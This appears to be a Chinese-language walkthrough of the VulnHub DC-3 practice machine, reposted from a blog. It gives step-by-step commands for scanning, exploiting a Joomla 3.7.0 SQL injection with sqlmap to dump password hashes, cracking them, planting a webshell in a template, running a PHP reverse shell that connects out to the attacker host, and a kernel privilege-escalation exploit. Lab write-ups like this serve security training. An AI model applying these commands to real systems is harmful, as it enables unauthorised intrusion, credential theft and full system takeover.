vulnhub DC-3靶机实战

0X01 环境部署

1.下载地址

https://www.vulnhub.com/entry/dc-32,312/

安装好并将网络置为NET模式

0X02 信息收集

1.主机发现

arpscan -l

2.端口收集

nmap -sS 192.168.190.130

发现存在80端口,可以进行查看

3.目录扫描

python3 dirsearch.py -u http://192.168.190.130/

成功找到后台
http://192.168.190.130/administrator/

4.查看网站配置

是一个名叫Joomla的CMS,可进行搜索利用

0X03 Getshell

1.漏洞发现

首先在kali上安装joomscan
sudo apt-get install joomscan

joomscan --url http://192.168.190.130

扫描到网页的版本是3.7.0

2.漏洞利用

searchsploit Joomla 3.7.0

可以看到存在sql注入

再查看使用方法

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

sqlmap -u "http://192.168.190.130/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]   
#爆破所有数据库

sqlmap -u "http://192.168.190.130/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]   
#爆破joomladb数据库下的所有表名

sqlmap -u "http://192.168.190.130/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T  "#__users" --columns -p list[fullordering]   
#爆破joomladb数据库下的#__users下的所有列

sqlmap -u "http://192.168.190.130/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "id,username,password" --dump -p list[fullordering]
#爆破joomladb数据库下的#__users下的id,username,password值

找到了账号密码
admin/$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu 

3.密码爆破

普通的md5无法解密

新建一个txt文件,进行破解
vim mm.txt
cat mm.txt
john mm.txt

账号密码 :admin/snoopy
成功登录后台

4.getshell

点击后台中的模板文件进行添加一句话

找到网站首页index.php文件,添加自己的一句话

访问一下
http://192.168.190.130/templates/beez3/index.php

蚁剑连接,连接成功

5.反弹shell

kali开启监听
nc -lvnp 5678

error.php文件写入
<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.190.128/5678 0>&1' ");
?>  

尝试访问error.php文件

反弹shell成功

0X04 提权

1.当前权限

whoami

查看内核版本信息/系统版本信息
uname -a
cat /etc/issue

2.查找漏洞

searchsploit ubuntu 16.04

最终选定,path 为39772.txt的漏洞,将其下载到本地桌面
cp /usr/share/exploitdb/exploits/linux/local/39772.txt /home/kali/Desktop/
打开文件并查看具体的使用方法
cd /home/kali/Desktop/
ls
cat 39972.txt

文件最后有exp下载链接

3.漏洞提权

以及蚁剑链接,可以通过下载到本地然后进行利用
下载链接
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip 

unzip 39772.zip   //解压压缩包
cd 39772.zip	 //切换到解压好的目录下
ls
tar -xvf exploit.tar  //解压提权压缩包
cd ebpf_mapfd_doubleput_exploit //切换目录

3.开始提权

./compile.sh
ls
./doubleput	//执行提权文件

whoami    //root
提权成功
cd /root
ls
cat the-flag.txt

0X05 总结

1.首先收集信息,真实ip,端口,网站目录,网站部署部件等
2.已知cms利用手法,查看漏洞,
3.利用漏洞得到后台账号密码
4.模板修改getshell
5.查看权限,根据系统内核版本进行提权
6.提权成功查看flag

猜你喜欢

转载自blog.csdn.net/m0_51195235/article/details/127163659